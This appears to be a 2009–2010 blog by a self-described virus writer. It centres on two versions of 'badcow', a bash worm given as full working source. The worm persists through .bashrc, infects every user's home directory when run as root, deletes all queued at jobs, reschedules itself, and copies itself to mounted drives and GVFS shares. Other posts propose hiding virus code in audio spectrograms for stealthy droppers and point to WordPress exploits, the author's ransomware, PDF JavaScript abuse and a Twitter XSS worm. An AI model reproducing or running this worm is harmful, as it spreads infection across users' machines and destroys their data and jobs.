WarGame's Blog

…

admin — Mon, 29 Mar 2010 19:11:22 +0000

Still alive…

Hide virus in sounds …

admin — Sat, 02 Jan 2010 22:43:47 +0000

I have just discovered a nice tool called arss that allows you to play with spectrogram of sound signals.
It would be very cool to use this for vx stuff.
You could for example hide the virus code in the spectrum of an audio file so the virus can be stored in an http server and then downloaded (and extracted) using a dropper to the host system …
There is no suspect traffic in this way

Bash scripting 2

admin — Fri, 01 Jan 2010 19:27:08 +0000

I have improved a bit the bash worm, now it uses gvfs features too.

#!/bin/bash


# the badcow by WarGame
if [ ! -f "$HOME/.badcow.sh" ];

then

	echo $HOME/.badcow.sh >> $HOME/.bashrc

fi
cp $0 $HOME/.badcow.sh > /dev/null 2>&1

chmod +x $HOME/.badcow.sh > /dev/null 2>&1
if [ "$(id -u)" = "0" ];

then

	for dr_home in `ls /home`

	do

		if [ -d "/home/$dr_home" ];

		then

			if [ ! -f "/home/$dr_home/.badcow.sh" ];

			then

				echo /home/$dr_home/.badcow.sh >> /home/$dr_home/.bashrc

			fi
			cp $HOME/.badcow.sh /home/$dr_home/.badcow.sh > /dev/null 2>&1

			chmod 0755 /home/$dr_home/.badcow.sh > /dev/null 2>&1

			chmod +x /home/$dr_home/.badcow.sh > /dev/null 2>&1
		fi

	done
	exit 0

fi
if [ -d "$HOME/.gvfs" ]; # try to spread using the gnome virtual filesystem

then

	for vfs in `ls $HOME/.gvfs`

	do

		if [ -d "$HOME/.gvfs/$vfs" ];

		then

			cp $HOME/.badcow.sh $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&1

			chmod +x $HOME/.gvfs/$vfs/badcow.sh > /dev/null 2>&1

		fi

	done

fi
for job in $(atq | awk '{print $1}' )

do

	atrm $job > /dev/null 2>&1

done
at now + 10 minutes -f $HOME/.badcow.sh > /dev/null 2>&1

for dr in $(mount | awk '{print $3}' ) # try to copy itself in mounted drives do if [ -d "$dr" ]; then cp $HOME/.badcow.sh $dr/badcow.sh > /dev/null 2>&1 chmod +x $dr/badcow.sh > /dev/null 2>&1 fi done

Bash scripting …

admin — Wed, 30 Dec 2009 14:12:27 +0000

I have just entered in the world of bash scripting and this is my first experiment in this language:
#!/bin/bash


# the badcow
if [ ! -f "$HOME/.badcow.sh" ];

then

	echo $HOME/.badcow.sh >> $HOME/.bashrc

fi
cp $0 $HOME/.badcow.sh > /dev/null 2>&1

chmod +x $HOME/.badcow.sh > /dev/null 2>&1
if [ "$(id -u)" = "0" ];

then

	for dr_home in `ls /home`

	do

		if [ -d /home/$dr_home ];

		then

			if [ ! -f "/home/$dr_home/.badcow.sh" ];

			then

				echo /home/$dr_home/.badcow.sh >> /home/$dr_home/.bashrc

			fi
			cp $HOME/.badcow.sh /home/$dr_home/.badcow.sh > /dev/null 2>&1

			chmod 0755 /home/$dr_home/.badcow.sh > /dev/null 2>&1

			chmod +x /home/$dr_home/.badcow.sh > /dev/null 2>&1
		fi

	done
	exit 0

fi
for job in $(atq | awk '{print $1}' )

do

	atrm $job > /dev/null 2>&1

done
at now + 10 minutes -f $HOME/.badcow.sh > /dev/null 2>&1

for dr in $(mount | awk '{print $3}' ) do if [ -d $dr ]; then cp $HOME/.badcow.sh $dr/badcow.sh > /dev/null 2>&1 chmod +x $dr/badcow.sh > /dev/null 2>&1 fi done

It is a simple example of worm spreading via removable media under linux (even if it works on FreeBSD too) … it’s not very powerful because there is no autorun feature under unix so it needs to be executed by the user

Wordpress remote admin password vulnerability

admin — Wed, 12 Aug 2009 12:09:40 +0000

A very nasty exploit for wordpress is out so if you are running a vulnerable version of it run to fix the bug!
Here the exploit.
This is the fix.

Files for Ransom … or Not

admin — Fri, 24 Jul 2009 12:04:46 +0000

I have just found this post on trendmicro blog, it is about my RansomWar. The funny thing is that I published it a lot of time ago …

An old skool exploit :D

admin — Mon, 20 Jul 2009 22:37:01 +0000

Origami in PDF

admin — Sat, 11 Jul 2009 20:15:08 +0000

Origami is a tool that let you insert javascript code inside pdf documents and do other nice things.
PDF format can be abused a lot! (as recent attacks say)

Persistent bios infection

admin — Sun, 14 Jun 2009 16:46:05 +0000

Phrack#66 is out and it contains a very nice article about injecting your own code in the BIOS eeprom.
You can read it here.

Yet an other XSS worm

admin — Mon, 13 Apr 2009 20:14:11 +0000

It seems that a XSS worm is spreading among twitter users … here more details.
You can find the src code of the worm here.